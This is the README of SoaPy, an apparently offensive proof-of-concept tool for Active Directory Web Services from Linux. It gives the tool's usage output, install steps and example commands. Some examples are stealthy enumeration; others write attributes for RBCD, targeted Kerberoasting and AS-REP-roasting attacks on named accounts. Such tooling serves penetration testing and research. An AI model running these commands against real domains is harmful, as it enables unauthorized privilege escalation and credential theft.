SoaPy is a Proof of Concept (PoC) tool for conducting offensive interaction with Active Directory Web Services (ADWS) from Linux hosts. SoaPy includes previously undeveloped custom python implementations of a collection of Microsoft protocols required for interaction with the ADWS service. This includes but is not limited to: NNS (.NET NegotiateStream Protocol), NMF (.NET Message Framing Protocol), and NBFSE (.NET Binary Format: SOAP Extension).
SoaPy can be primarily utilized to interact with ADWS for stealthy enumeration over a proxy into an internal Active Directory environment. Additionally SoaPy can perform targeted exploitation over ADWS, including servicePrincipalName
writing for targeted Kerberoasting, DON’T_REQ_PREAUTH
writing for targeted ASREP-Roasting, and the ability to write to msDs-AllowedToActOnBehalfOfOtherIdentity
for Resource-Based Constrained Delegation attacks.
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usage: soapy [-h] [--debug] [--ts] [--hash nthash] [--users] [--computers] [--groups] [--constrained] [--unconstrained] [--spns] [--asreproastable] [--admins] [--rbcds]
[-q query] [--filter attr,attr,...] [--rbcd source] [--spn value] [--asrep] [--account account] [--remove]
Enumerate and write LDAP objects over ADWS using the SOAP protocol
positional arguments:
connection domain/username[:password]@<targetName or address>
-h, --help show this help message and exit
--debug Turn DEBUG output ON
--ts Adds timestamp to every logging output.
--hash nthash Use an NT hash for authentication
--users Enumerate user objects
--computers Enumerate computer objects
--groups Enumerate group objects
--constrained Enumerate objects with the msDS-AllowedToDelegateTo attribute set
--unconstrained Enumerate objects with the TRUSTED_FOR_DELEGATION flag set
--spns Enumerate accounts with the servicePrincipalName attribute set
--asreproastable Enumerate accounts with the DONT_REQ_PREAUTH flag set
--admins Enumerate high privilege accounts
--rbcds Enumerate accounts with msDs-AllowedToActOnBehalfOfOtherIdentity set
-q query, --query query
Raw query to execute on the target
--filter attr,attr,...
Attributes to select from the objects returned, in a comma seperated list
--rbcd source Operation to write or remove RBCD. Also used to pass in the source computer account used for the attack.
--spn value Operation to write the servicePrincipalName attribute value, writes by default unless "--remove" is specified
--asrep Operation to write the DONT_REQ_PREAUTH (0x400000) userAccountControl flag on a target object
--account account Account to preform an operation on
--remove Operarion to remove an attribute value based off an operation
With pipx
pipx install .
With poetry
poetry install
Enumerate users using preset enumeration flags:
soapy <domain>/<user>:'<password>'@<ip> --users
Enumerate computers samAccountName
and objectSid
using a custom query/attribute filtering:
soapy <domain>/<user>:'<password>'@<ip> --query '(objectClass=computer)' --filter "samaccountname,objectsid"
Write msDs-AllowedToActOnBehalfOfOtherIdentity
on DC01, enabling delegation from MS01 for an RBCD attack:
soapy <domain>/<user>:'<password>'@<ip> --rbcd 'MS01$' --account 'DC01$'
Write the servicePrincipalName
attribute on jdoe as part of a targeted Kerberoasting attack:
soapy <domain>/<user>:'<password>'@<ip> --spn test/spn --account jdoe
(0x400000) on jdoe's userAccountControl
attribute, making the account ASREP-Roastable:
soapy <domain>/<user>:'<password>'@<ip> --asrep --account jdoe